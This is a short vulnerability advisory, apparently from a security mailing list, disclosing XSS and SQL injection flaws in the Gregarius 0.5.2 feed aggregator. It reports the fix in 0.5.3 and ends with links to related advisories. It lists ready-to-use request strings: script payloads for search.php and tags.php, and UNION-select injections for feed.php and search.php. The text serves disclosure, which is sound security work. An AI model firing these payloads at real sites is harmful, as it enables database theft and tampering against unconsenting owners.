Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities



http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want.

XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact

XSS in tags.php:
tags.php?tag=<script>alert(1)</script>

SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact


On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.

Fixed in latest 0.5.3 svn.



Relevant Pages

  • [waraxe-2004-SA#021 - Multiple vulnerabilities in phprofession 2.5 module for PostNuke]
    ... Unsanitaized variable "jcode" will open a way to exploit the XSS in phprofession: ... Good thing for webmasters is, that in case of MySql ... Point is, that this sql injection is in this moment non-critical, but it's ... You have an error in your SQL syntax. ...
    (Bugtraq)
  • Multiple Sql injection and XSS in Asp Nuke 0.80 (Working exploits included)
    ... Multiple Sql injection and XSS in Asp Nuke 0.80 ... multiple sql injection and xss in asp nuke 0.80. ... Syntax error converting the varchar value 'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a column of data type int. ...
    (Bugtraq)
  • Multiple vulnerabilities in postfixadmin
    ... SQL injection in pacrypt function: if postfixadmin is configured with 'mysql_encrypt' the pacrypt function passes the $pw parameter to sql query without santitzing it allowing non-admin users to perform sql injection attacks. ... XSS in edit-vacation.php: Input passed via fDomain POST parameter to create-domain.php is not properly sanitised before being returned to the user. ...
    (Bugtraq)
  • Re: Testing for SQL injection or Cross Site scripting
    ... you can add your own XSS / SQL Injection values /tests. ... Securing Apache Web Server with thawte Digital Certificate ...
    (Security-Basics)
  • Re: checking web applications for exploits
    ... You would definitely want to fix SQL Injection, ... (XSS) ... default accompany any request directed for it's domain. ... Securing Apache Web Server with thawte Digital Certificate ...
    (Security-Basics)